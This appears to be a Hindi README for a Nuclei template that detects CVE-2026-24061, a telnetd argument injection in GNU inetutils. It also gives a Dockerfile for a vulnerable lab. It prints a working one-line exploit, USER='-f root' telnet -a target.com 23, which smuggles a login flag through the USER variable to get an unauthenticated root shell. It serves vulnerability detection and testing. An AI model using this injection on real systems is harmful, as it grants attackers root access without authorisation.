
# CVE-2026-24061 का पता लगाने के लिए Nuclei टेम्पलेट, GNU inetutils telnetd में एक गंभीर telnet आर्गुमेंट इंजेक्शन जो बिना प्रमाणीकरण के रूट एक्सेस की अनुमति देता है।
Nuclei टेम्पलेट GNU inetutils telnetd में CVE-2026-24061 भेद्यता का पता लगाने के लिए, जो बिना प्रमाणीकरण के root एक्सेस प्राप्त करने की अनुमति देता है।
CVE-2026-24061 GNU inetutils telnetd में एक गंभीर argument injection भेद्यता है, जो हमलावर को पासवर्ड जाने बिना root shell प्राप्त करने की अनुमति देती है।
%U के साथ एक नया लॉगिन टेम्पलेट जोड़ा गया था: /usr/bin/login -p -h %h %?u{-f %u}{%U}
भेद्यता: पर्यावरण चर USER telnet प्रोटोकॉल (RFC 1572 NEW-ENVIRON) के माध्यम से पारित किया जाता है और कमांड में प्रतिस्थापित करने से पहले सैनिटाइज़ नहीं किया जाता।
शोषण: हमलावर कनेक्ट करते समय USER="-f root" सेट करता है:
USER="-f root" telnet -a target.com 23
/usr/bin/login -p -h hostname -f root
फ्लैग -f का अर्थ है "skip authentication" → बिना पासवर्ड root 💀
inetutils-telnetd 2:2.0-1+deb11u2nuclei -t cve-2026-24061.yaml -u target.com:23 -code
nuclei -t cve-2026-24061.yaml -l targets.txt -code
परीक्षण के लिए एक उपयुक्त Docker कंटेनर बनाया जा सकता है:
FROM debian:11-slim
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
apt-get install -y --no-install-recommends \
inetutils-telnetd=2:2.0-1+deb11u2 \
telnet && \
rm -rf /var/lib/apt/lists/*
RUN useradd user1 && \
sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf
EXPOSE 23
CMD ["/usr/sbin/inetutils-inetd", "-d"]
चलाना:
# इमेज बनाएं
docker build -t vuln-telnetd .
# चलाएं
docker run -d -p 2323:23 vuln-telnetd
# भेद्यता जांचें
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code -v
9.8 / 10 - Critical
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
यह उपकरण केवल कानूनी सुरक्षा परीक्षण के लिए है, उन सिस्टमों पर जिनके लिए आपके पास स्पष्ट अनुमति है।
लेखक इस टेम्पलेट के दुरुपयोग के लिए ज़िम्मेदार नहीं है।
Created by Mr.Zapi